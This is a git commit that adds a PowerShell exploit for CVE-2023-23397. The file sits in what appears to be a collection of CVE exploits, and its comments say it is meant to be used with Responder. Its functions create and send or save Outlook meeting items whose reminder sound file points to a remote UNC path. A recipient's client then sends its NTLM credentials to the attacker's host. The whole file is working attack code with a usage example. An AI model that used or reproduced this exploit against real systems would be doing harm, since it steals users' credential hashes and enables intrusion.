add CVE-2023-23397 exp

2023-04-19 13:37:56 +08:00 · 2023-04-19 13:37:56 +08:00 · fa87e9ac44
commit fa87e9ac44
parent 76344e8c8a
1 changed files with 46 additions and 0 deletions
--- a/00-CVE_EXP/CVE-2023-23397/exp.ps1
+++ b/00-CVE_EXP/CVE-2023-23397/exp.ps1
@ -0,0 +1,46 @@
+
+# CVE-2023-23397
+# outlook 信息泄露漏洞
+# 需要配合Responder 使用
+
+# usage
+#  Import-Module .\exp.ps1
+# Send-CalendarNTLMLeak -recipient "test@xyc.com" -remotefilepath "192.168.128.132\\\foo\bar.wav" -meetingsubject "THM Meeting" -meetingbody "This is just a test"
+
+
+function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $meetingbody)
+{
+    # Add-Type -assembly "Microsoft.Office.Interop.Outlook"
+
+    $Outlook = New-Object -comobject Outlook.Application
+    $newcal = $outlook.CreateItem('olAppointmentItem')
+    $newcal.ReminderSoundFile = $remotefilepath
+    $newcal.Recipients.add($recipient)
+    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
+    $newcal.Subject = $meetingsubject
+    $newcal.Location = "Virtual"
+    $newcal.Body = $meetingbody
+    $newcal.Start = get-date
+    $newcal.End = (get-date).AddHours(2)
+    $newcal.ReminderOverrideDefault = 1
+    $newcal.ReminderSet = 1
+    $newcal.ReminderPlaysound = 1
+    $newcal.send()
+}
+
+function Save-CalendarNTLMLeak ($remotefilepath, $meetingsubject, $meetingbody)
+{
+    $Outlook = New-Object -comObject Outlook.Application
+    $newcal = $outlook.CreateItem('olAppointmentItem')
+    $newcal.ReminderSoundFile = $remotefilepath
+    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
+    $newcal.Subject = $meetingsubject
+    $newcal.Location = "Virtual"
+    $newcal.Body = $meetingbody
+    $newcal.Start = get-date
+    $newcal.End = (get-date).AddHours(2)
+    $newcal.ReminderOverrideDefault = 1
+    $newcal.ReminderSet = 1
+    $newcal.ReminderPlaysound = 1
+    $newcal.save()
+}